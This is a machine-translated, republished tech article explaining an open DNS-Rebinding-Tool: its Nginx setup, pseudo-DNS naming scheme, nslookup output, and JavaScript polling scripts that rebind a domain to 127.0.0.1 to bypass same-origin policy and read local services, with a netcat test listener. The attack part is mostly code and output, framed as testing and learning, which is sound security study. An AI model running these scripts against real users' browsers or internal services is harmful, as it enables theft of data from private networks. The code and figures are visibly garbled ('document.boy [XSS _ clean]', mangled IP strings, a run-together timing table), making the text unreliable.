Shulou(Shulou.com)05/31 Report--

This article will explain what kind of script DNS-Rebinding-Tool is for you in detail. The editor thinks it is very practical, so I share it with you for reference. I hope you can get something after reading this article.

DNS-Rebinding-Tool

DNS-Rebinding-Tool is a DNS rebinding tool with custom scripts. This project integrates a variety of features that can be used to test DNS rebinding attacks and help us learn more about this type of cyber attacks. The tool consists of a Web server and a pseudo-DNS server, which is mainly used to respond to user requests.

The root index of the Web server allows users to customize the configuration, and attack tests can be performed using the basic Web graphical interface.

The basic Nginx configuration of the Web server host is as follows:

Server {listen 80; server_name dnsrebindtool.43z.one; location / {proxy_pass http://localhost:5000;}}

The / attack path of the Web server can read the GET parameter "script", which provides a Basic64-encoded JavaScript script and responds to the request with decoding code embedded in a regular HTML page:

% curl "http://dnsrebindtool.43z.one/attack?script=YWxlcnQoMSk=" setTimeout (function () {alert (1)}, 3000)

In the domain name 43z.one that I registered, I configured a NS record for the subdomain rebind and pointed to the IP address hosted by the tool:

Ns A 81.4.124.10rebind NS ns.43z.one

The DNS server only responds to the following query requests:

Evcmxfm4g. 81-4-124-10. 127-0-0-1. Rebind.43z.one

The first part (subdomain name) is a random ID, and each attack session will generate such a random ID. The second part is the IP address that the DNS server needs to respond after two seconds, and the third part is the IP address that the DNS server needs to respond after the interval:

$date & & nslookup-type=an evcmxfm4b.81-4-10.127-0-0-1.rebind.43z.one Fri Feb 2 21:18:20 CET 2018Server: 8.8.8.8Address: 8.8.8.8#53Non-authoritative answer:Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.oneAddress: 81.4.124.10$ date & & nslookup-type=an evcmxfm4b.81-4-10.127-0-0-1 .rebind.43z.oneFri Feb 2 21:18:23 CET 2018Server: 8.8.8.8Address: 8.8.8.8#53Non-authoritative answer:Name: evcmxfm4b.81-4-10.127-0-0-1.rebind.43z.oneAddress: 127.0.0.1

Finally, there is the Nginx configuration item for the rebound domain name. The tool only accepts the / attack path, and other parameters passed will respond with error messages. This mechanism allows attackers to attack other services on port 80, such as / api/monitoring/stats:

Server {listen 80; server_name * .rebind.43z.one; location / {return 404;} location / attack {proxy_pass http://localhost:5000/attack; }} DNS cache reclaim var xhr = new XMLHttpRequest () xhr.open ('GET',' czg9g2olz.81-4-10.127-0-0-1.rebind.43z.onebelt, false) xhr.send () / / first time the browser sees this domain it queries the dns server// and gets 81.4.124.10 secxhr.open / sleep for more than 2 secxhr.open ('GET',' czg9g2olz.81-4-124-10.127-0-1.rebind.43z.one' False) xhr.send () / / still uses 81.4.124.10 (AND NOT 127.0.0.1) / / NO dns query happened browser used cached IP

This is also a "common problem" of such attacks. In order to implement the attack, the browser needs to resend a new DNS query request to obtain a second IP address. My test results show that we can use the following script to measure the optimal value of the WAIT variable (the interval between sending query requests). My test platform is Debian buster/sid and the browser version is Chromium 62.0.3202.89:

Var WAIT = 200var start = Date.now () var interval = setInterval (function () {var xhr = new XMLHttpRequest () xhr.open ('GET',' / /'+ $REBIND_DOMAIN, false) xhr.send () if (xhr.status = = 200) {document.boy [XSS _ clean] = (Date.now ()-start) / 1000 document.boy [XSS _ clean] + = xhr.responseText clearInterval (interval) return} WAIT) WAIT value / number of requests sent by millisecond Chrome interval 070060107001006006312063150400631804007520030063220300692503007808730020063320340200713602007538020079400200831000100103 complete test: echo-e "HTTP/1.1 200 OK\ n\ n TOPSECRET" | sudo nc-lvp 80-Q1 127.0.0.1

This netcat instance can provide some content that we are interested in, and here I keep the default rebinding domain "$RANDOM$.81-4-124-10.127-0-0-1.rebind.43z.one" and the default script.

Var start = Date.now () var interval = setInterval (function () {var xhr = new XMLHttpRequest () xhr.open ('GET',' / /'+ $REBIND_DOMAIN, false) xhr.send () if (xhr.status = = 200) {document.body [XSS _ clean] = (Date.now ()-start) / 1000 document.boy [XSS _ clean] + = xhr.responseText clearInterval (interval) return}}, 200)

Visit [dnsrebindtool.43z.one] and click the "Attack" button. Open the Network tab of the development tool and we can directly see what is happening in the background. I filtered out the string "TOPSECRET", and our DNS rebinding attack successfully bypassed SOP, and to get the leaked data from iframe, we also need to use Window.PostMessage () or forward the data to another server of the attacker.

This is the end of the article on "what is the script of DNS-Rebinding-Tool". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it out for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.